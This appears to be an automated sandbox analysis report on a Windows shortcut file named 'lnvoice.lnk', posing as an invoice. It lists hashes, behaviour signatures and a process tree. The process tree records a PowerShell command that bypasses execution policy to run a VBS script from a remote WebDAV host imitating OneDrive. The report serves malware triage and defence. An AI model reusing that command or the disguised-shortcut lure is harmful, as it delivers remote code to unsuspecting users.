Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 08/04/2024, 17:29
Static task
static1
Behavioral task
behavioral1
Sample
lnvoice.lnk
Resource
win7-20240220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
lnvoice.lnk
Resource
win10v2004-20240226-en
5 signatures
150 seconds
General
Target: lnvoice.lnk
Size: 1KB
MD5: f3ef596835aba4c8bab9c6edb8be5a00
SHA1: 34d857c809cc61ced5697eafacaf5ad5ce722120
SHA256: 3a0720342249d8354e236292fc23be9d7d5a92bde5f23201283ef8f88671047f
SHA512: 7f3414303866c0e77ec04d9c3950acc7d7a708683324d5c09d69ff2beaf66428e30450457b3751ac9938a9d537708e70780b4bc9189aa56124eba1d08ec5d048
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid   Process
2600  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2600  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
description                       pid   Process   procid_target
PID 1688 wrote to memory of 2600  1688  cmd.exe   29
PID 1688 wrote to memory of 2600  1688  cmd.exe   29
PID 1688 wrote to memory of 2600  1688  cmd.exe   29
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\lnvoice.lnk
  PID: 1688
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1688)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass \\onedrive.bounceme.net\DavWWWRoot\test.vbs
    PID: 2600
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken